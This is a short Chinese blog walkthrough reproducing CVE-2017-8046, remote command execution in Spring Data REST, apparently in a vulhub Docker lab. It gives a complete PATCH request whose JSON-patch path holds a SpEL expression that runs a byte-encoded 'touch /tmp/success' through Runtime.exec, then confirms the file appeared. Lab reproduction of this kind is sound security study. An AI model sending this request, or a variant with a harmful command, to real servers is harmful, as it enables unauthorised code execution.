Spring Data Rest 远程命令执行命令(CVE-2017-8046)

谪仙1232024-09-24 16:31

(1)访问 http://your-ip:8080/customers/1,然后抓取数据包,使用PATCH请求来修改

PATCH /customers/1 HTTP/1.1

Host:

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json-patch+json

Content-Length: 202

{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }

返回kali 输入命令进docker入容器 ls /tmp查看 可以发现 成功创建success

相关推荐
Filotimo_12 分钟前
Tomcat的概念
java·tomcat
索荣荣44 分钟前
Java Session 全面指南:原理、应用与实践(含 Spring Boot 实战)
java·spring boot·后端
Amumu121381 小时前
Vue Router(二)
java·前端
念越1 小时前
数据结构:栈堆
java·开发语言·数据结构
千寻技术帮2 小时前
10333_基于SpringBoot的家电进存销系统
java·spring boot·后端·源码·项目·家电进存销
dear_bi_MyOnly2 小时前
【多线程——线程状态与安全】
java·开发语言·数据结构·后端·中间件·java-ee·intellij-idea
jiaguangqingpanda2 小时前
Day36-20260204
java·开发语言
tb_first2 小时前
万字超详细苍穹外卖学习笔记4
java·spring boot·笔记·学习·spring·mybatis
努力写代码的熊大2 小时前
c++异常和智能指针
java·开发语言·c++
热门推荐
01GitHub 镜像站点02Vue-skills的中文文档03一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示04Claude Code Skills 实用使用手册05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南07UV安装并设置国内源08OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书09在Trae中使用Pencil MCP10Linux下V2Ray安装配置指南